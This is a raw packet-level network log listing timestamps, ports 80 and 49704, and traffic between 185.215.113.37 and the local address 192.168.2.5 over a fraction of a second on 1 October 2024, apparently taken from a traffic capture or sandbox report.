Oct 1, 2024 19:32:05.520651102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.520678043 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.520699978 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.567512035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.567523956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.567533970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.567552090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.567563057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.567574024 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.567574978 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.567586899 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.567611933 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.567656040 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.567699909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.567709923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.567720890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.567732096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.567739010 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.567743063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.567754984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.567764997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.567765951 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.567794085 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.567811966 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.604243994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.604311943 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.604368925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.604382038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.604393005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.604403019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.604414940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.604415894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.604425907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.604432106 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.604438066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.604448080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.604470968 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.604490042 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.604568005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.604578972 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.604593039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.604615927 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.604636908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.604644060 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.604648113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.604660034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.604671955 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.604674101 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.604697943 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.604722977 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.604819059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.604830027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.604840040 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.604851007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.604861021 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.604862928 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.604871988 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.604873896 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.604902029 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.604922056 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.605189085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.605201006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.605211973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.605235100 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.605262995 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.605278969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.605290890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.605300903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.605312109 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.605319977 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.605336905 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.605356932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.605357885 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.605369091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.605380058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.605398893 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.605408907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.605412960 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.605420113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.605429888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.605441093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.605446100 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.605472088 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.605494976 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.605519056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.605530977 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.605541945 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.605551004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.605556965 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.605576992 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.605597973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.605598927 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.605608940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.605621099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.605633974 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.605638027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.605649948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.605650902 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.605664015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.605664968 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.605676889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.605700970 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.605711937 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.605719090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.605730057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.605740070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.605757952 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.605783939 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.606268883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.606281042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.606291056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.606317997 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.606329918 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.606344938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.606355906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.606367111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.606378078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.606381893 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.606389999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.606391907 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.606411934 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.606437922 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.606460094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.606470108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.606481075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.606491089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.606499910 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.606503010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.606506109 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.606514931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.606528044 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.606554985 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.606601000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.606611967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.606621981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.606632948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.606642008 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.606645107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.606654882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.606666088 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.606674910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.606683969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.606693983 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.606708050 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.606733084 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.641303062 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.641314983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.641325951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.641371965 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.641383886 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.641446114 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.641457081 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.641474009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.641483068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.641485929 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.641494989 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.641505003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.641513109 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.641532898 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.641544104 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.641676903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.641688108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.641699076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.641710043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.641725063 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.641753912 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.641843081 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.641854048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.641864061 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.641875029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.641876936 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.641885996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.641897917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.641907930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.641908884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.641935110 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.641949892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.642107964 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.642148972 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.642151117 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.642159939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.642170906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.642183065 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.642195940 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.642215967 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.642235994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.642252922 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.642268896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.642270088 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.642282009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.642292976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.642292976 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.642301083 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.642303944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.642318010 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.642332077 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.642380953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.642390966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.642401934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.642412901 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.642416954 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.642422915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.642442942 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.642469883 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.654223919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.654234886 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.654244900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.654263020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.654273033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.654284000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.654287100 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.654295921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.654305935 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.654320002 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.654331923 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.654356956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.654369116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.654378891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.654395103 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.654413939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.654422998 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.654426098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.654438019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.654448986 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.654467106 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.654503107 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.654582977 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.654592991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.654619932 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.654630899 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.691184998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.691195965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.691207886 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.691226959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.691236973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.691247940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.691248894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.691260099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.691282034 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.691298962 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.691318035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.691329002 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.691339016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.691354990 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.691366911 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.691425085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.691462994 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.691467047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.691478968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.691508055 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.691517115 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.691535950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.691546917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.691556931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.691569090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.691576958 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.691601992 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.691628933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.691647053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.691663027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.691674948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.691675901 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.691699028 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.691723108 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.691925049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.691967964 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.691998005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.692009926 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.692039967 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.692061901 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.692065001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.692075968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.692086935 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.692099094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.692109108 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.692111969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.692121983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.692137957 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.692150116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.692158937 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.692162037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.692188978 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.692212105 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.692347050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.692359924 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.692375898 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.692384958 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.692388058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.692399979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.692403078 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.692409039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.692419052 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.692425013 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.692426920 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.692439079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.692445040 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.692455053 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.692455053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.692481041 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.692503929 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.692528963 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.692538977 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.692555904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.692564011 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.692574978 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.692596912 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.692751884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.692763090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.692774057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.692785025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.692796946 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.692796946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.692819118 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.692826986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.692842007 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.692863941 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.692994118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.693005085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.693022966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.693033934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.693038940 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.693051100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.693062067 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.693063974 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.693073034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.693088055 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.693090916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.693103075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.693114042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.693114042 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.693137884 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.693150997 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.693183899 CEST	80	49704	185.215.113.37	192.168.2.5
